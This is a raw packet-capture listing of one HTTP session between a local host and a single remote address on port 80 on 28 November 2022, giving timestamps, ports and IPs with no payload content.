Nov 28, 2022 16:37:04.196654081 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196671009 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196690083 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196710110 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196727037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196748018 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196768999 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196789026 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196805954 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.196820021 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196842909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196862936 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196883917 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196906090 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196929932 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196950912 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196969986 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196975946 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.197000027 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197022915 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197026014 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.197026014 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.197050095 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197171926 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197184086 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.197276115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197299004 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197324038 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197345018 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197355032 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.197379112 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197402954 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197427034 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197452068 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197470903 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197490931 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197510004 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197524071 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.197530031 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197541952 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197554111 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197565079 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197576046 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197587967 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197598934 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197607994 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.197616100 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197628021 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197638988 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197650909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197662115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197673082 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197685003 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197695971 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197706938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197717905 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197730064 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197741032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197752953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197771072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.197781086 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.197948933 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.198054075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198117971 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.198157072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198204041 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198215961 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198226929 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198239088 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198250055 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198261023 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198272943 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198283911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198287964 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.198302031 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198313951 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198324919 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198335886 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198348045 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198359966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198370934 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198381901 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198394060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198405027 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198416948 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198427916 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198438883 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198457003 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198462009 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.198477983 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198489904 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198508024 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198528051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198549032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198570013 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198582888 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198595047 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198606014 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.198627949 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.198800087 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.198800087 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.199023962 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199105024 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199167967 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199182987 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199194908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199208021 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199210882 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.199225903 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199265003 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199278116 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199290037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199302912 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199315071 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199326992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199338913 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199352026 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199363947 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199376106 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199382067 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.199382067 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.199414968 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199426889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199440002 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199451923 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199476004 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199491024 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199512005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199525118 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199536085 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199547052 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199549913 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.199549913 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.199565887 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199578047 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199589014 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199600935 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199611902 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199624062 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.199723005 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.199889898 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.199990988 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200105906 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200155973 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200169086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200181007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200193882 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200206041 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200218916 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200231075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200242996 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200256109 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200268984 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200278997 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.200278997 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.200288057 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200300932 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200351954 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200364113 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200375080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200388908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200429916 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200450897 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.200458050 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200472116 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200484037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200495005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200505972 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200517893 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200529099 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200540066 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200551987 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200562000 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.200651884 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.200651884 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.200813055 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.200958967 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.206931114 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207032919 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207077026 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.207106113 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207118988 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207129955 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207143068 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207154036 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207165956 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207178116 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207190037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207201004 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207212925 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207225084 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207237005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207256079 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207271099 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.207271099 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.207292080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207307100 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207319021 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207330942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207343102 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207355022 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207365990 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207377911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207390070 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207401991 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207412004 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207423925 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207436085 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207438946 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.207453012 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207464933 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207477093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207488060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207499981 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207530022 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207541943 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207554102 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207576990 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207588911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207601070 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207612038 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.207623959 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207640886 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207652092 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207663059 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207674026 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207684040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207695007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207705975 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207753897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207781076 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.207781076 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.207825899 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207848072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207861900 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207873106 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207911968 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.207992077 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.207992077 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.208033085 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208084106 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208111048 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208125114 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208137035 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208149910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208162069 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.208162069 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.208194971 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208208084 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208220005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208233118 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208245993 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208257914 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208270073 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208281994 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208295107 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208316088 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208331108 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208333015 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.208348036 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208359003 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208370924 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208381891 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208393097 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208404064 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208415985 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208425045 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.208502054 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.208502054 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.208659887 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.208659887 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.208828926 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.209788084 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.209906101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.209918022 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.209932089 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.209960938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.209973097 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.209975004 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.209988117 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210000992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210011959 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210035086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210046053 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210057020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210067987 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210078001 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210088968 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210099936 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210118055 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210138083 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210145950 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.210145950 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.210170031 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210181952 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210191965 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210202932 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210213900 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210225105 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210235119 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210243940 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210254908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210266113 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210277081 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210288048 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210299015 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210308075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210311890 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.210324049 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210376978 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210387945 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210398912 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210454941 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210469007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210485935 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.210495949 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210516930 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210531950 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210541964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210552931 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210563898 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210573912 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210585117 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210594893 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210606098 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210617065 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210627079 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210638046 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210649967 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210658073 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.210658073 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.210658073 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.210658073 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.210690022 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210711956 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210725069 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210736036 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.210864067 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.210864067 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.211035967 CET	49830	80	192.168.11.20	104.21.2.6
